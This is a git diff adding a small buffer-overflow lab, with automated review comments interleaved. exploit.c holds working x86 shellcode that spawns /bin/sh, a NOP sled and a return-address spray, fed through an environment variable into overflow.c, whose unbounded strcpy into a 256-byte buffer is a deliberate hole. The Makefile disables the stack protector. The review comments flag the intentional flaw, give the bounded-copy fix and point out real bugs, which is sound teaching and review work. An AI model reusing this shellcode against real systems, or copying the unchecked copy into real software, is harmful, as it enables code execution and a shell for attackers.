-rwxr-xr-x | Makefile | 15 | ||||
-rw-r--r-- | exploit.c | 51 | ||||
-rw-r--r-- | overflow.c | 34 |
3 files changed, 100 insertions, 0 deletions
diff --git a/Makefile b/Makefile
new file mode 100755
index 0000000..f6d973d
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,15 @@
+RM := rm
+
+all: exploit overflow
+
+exploit:
+ @echo 'building exploit'
+ gcc -g -fno-stack-protector exploit.c -o exploit
+
+overflow:
+ @echo 'building overflow'
+ gcc -g -fno-stack-protector overflow.c -o overflow
+
+clean:
+ -$(RM) overflow exploit
+ -@echo ' '
diff --git a/exploit.c b/exploit.c
new file mode 100644
index 0000000..3137c91
--- /dev/null
+++ b/exploit.c
@@ -0,0 +1,51 @@
+/*
+ * main.c
+ *
+ * Created on: 27.01.2012
+ * Author: druid
+ */
+
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <string.h>
+
+#define PATH_CT "./overflow"
+#define ENV_VAR "EXPLOIT"
+#define NOP 0x90
+
+
+static char shellcode[]=
+"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
+"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
+
+u_long
+esp()
+{
+ __asm__("movl %esp, %eax");
+}
+
+int
+main()
+{
+
+ u_char buf[1032];
+ u_long addr;
+ int i;
+
+ strcpy(buf, "/usr/bin/pico; ");
+
+ addr = esp() - 192;
+ for (i = 16; i < 128 + 16; i += 4)
+ *((u_long *) (buf + i)) = addr;
+ for (i = 128 + 16; i < 1040; i++)
+ buf[i] = 0x90;
+ for (i = 0; i < strlen(shellcode); i++)
+ buf[1040 + i] = shellcode[i];
+ buf[1040 + i] = '\n';
+
+ setenv(ENV_VAR, buf, 1);
+ execl(PATH_CT, "overflow", (char *) 0);
+}
diff --git a/overflow.c b/overflow.c
new file mode 100644
index 0000000..de2a1ab
--- /dev/null
+++ b/overflow.c
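Review bot: The `exploit` and `overflow` targets list no prerequisites, so `make` never rebuilds either binary after its source changes and `make all` is a no-op once the files exist; write `exploit: exploit.c` and `overflow: overflow.c`. The `-fno-stack-protector` flag on both gcc lines deliberately disables the compiler's stack protector so the lab is reproducible, and that intent deserves a comment such as `# lab build: stack protector disabled on purpose, do not reuse these flags` so the flags are not copied into a real build. As rendered here the recipe lines begin with a space rather than the tab make requires; this may be a display artefact of the page, but it is worth confirming in the committed file.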
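Review bot: `buf` is declared `u_char buf[1032]`, yet the second loop runs to index 1039 and the last loop and the trailing `'\n'` assignment write `buf[1040 + i]`, so the program overruns its own local array before `setenv` is reached; that is undefined behaviour (the same class of defect the lab is meant to show) and either the declared size or the indices should be reconciled. `esp()` is declared to return `u_long` but has no `return` statement, and C does not guarantee that a value left in %eax by the inline asm becomes the function's result, so its value is unspecified once optimisation is on. The `setenv` and `execl` return values are unchecked, so a failed exec falls off the end of `main` with no diagnostic and no exit status; `perror("execl"); return 1;` after the `execl` call would surface it. The `/usr/bin/pico; ` prefix and the `192` offset are unexplained magic values and should each carry a comment stating what layout they assume.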
@@ -0,0 +1,34 @@
+/*
+ * overflow.c
+ *
+ * Created on: 27.01.2012
+ * Author: druid
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define ENV_VAR "EXPLOIT"
+#define BUFLEN 256
+
+u_char buf[BUFLEN];
+u_char *env;
+
+int
+main()
+{
+ if (env = getenv(ENV_VAR))
+ {
+ fprintf(stderr, "env: "ENV_VAR" set\n");
+ fprintf(stderr, "env: %s\n", env);
+
+ strcpy(buf, env);
+ }
+ else
+ {
+ fprintf(stderr, "env: "ENV_VAR" not set, abort!\n");
+ }
+
+ return 0;
+}
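Review bot: `strcpy(buf, env)` copies an unbounded, externally supplied environment value into the 256-byte `buf` with no length check; that is evidently the defect this lab exists to demonstrate, but the hunk never says so, and a reader could mistake it for an oversight, so add `/* INTENTIONAL: unbounded copy is the bug this lab demonstrates */` above the call. Outside the lab the correct form is `snprintf((char *)buf, sizeof buf, "%s", env);` or a `strlen(env) < BUFLEN` check before copying. The condition `if (env = getenv(ENV_VAR))` is an assignment used as a test and trips `-Wparentheses`; write `if ((env = getenv(ENV_VAR)))` to make the intent explicit. The "not set" branch prints "abort!" but still returns 0, so a caller cannot tell the two outcomes apart; `return 1;` there would match the message.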